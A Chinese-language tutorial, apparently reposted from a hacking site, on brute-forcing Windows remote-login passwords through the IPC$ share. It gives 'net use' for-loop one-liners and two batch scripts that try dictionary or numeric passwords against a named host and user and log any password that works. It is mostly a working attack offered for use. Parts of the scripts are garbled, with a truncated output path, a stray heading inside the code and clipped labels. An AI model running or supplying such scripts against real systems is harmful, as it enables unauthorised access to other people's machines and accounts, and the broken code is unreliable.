穷举法破解远程登录windows系统的密码
穷举法破解远程登录windows系统的密码
一、首先用工具生成字典文件,笔者用的是《黑刀超级字典生成器》。记录好文件的绝对路径。
二、与远程主机建立连接,然后DOS命令得用字典里的密码登录:  
1、字典:for /f %i in (字典文件) do net use \\主机ip\ipc$ "%i" /user:"用户名"  
2、数字:for /l %i in (start,step,end) do net use \\主机ip\ipc$ "%i" /user:"用户名"
这样只是登录了,但要想知道密码的话如下方法: 
将下面文件存为pass.bat:  
@echo off  
date /t >>c:\  
echo 破解结果: >>c:\  
if "%6"=="1" goto shit2  
:shit1  
start "正在破解" /min
cmd /c
for /f %%i in (%1) do call execute.bat %2 "%%i" %3  
goto quit  
:shit2  
start "正在破解" /min
cmd /c
for /l %%i in (%1,%2,%3) do call execute.bat %4 "%%i" %5  
:quit  
将下面文件存为execute.bat:  
net use \\%1\ipc$ %2 /user:"%3"  
goto answer%ERRORLEVEL%  
如何破解密码
rem %ERRORLEVEL%表示取前一命令执行返回结果,net use成功返回0,失败返回1 
:answer0  
echo 远程主机:"%1" >>c:\  
echo 户:"%3" >>c:\  
echo 码:%2 >>c:\  
net use \\%1\ipc$ /delet  
exit  
:answer1  
pass.batexecute.bat存放于system32中,用法如下:  
1、如果用字典破:pass.bat 字典文件路径及名称 主机 用户名  
2、如果用数字破:pass.bat 起始数 步长 结束数 主机 用户名 1 
密码出来之后,存放于c:\文件里面。
关于2000xp的两篇不错了文章,建议你去看看。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。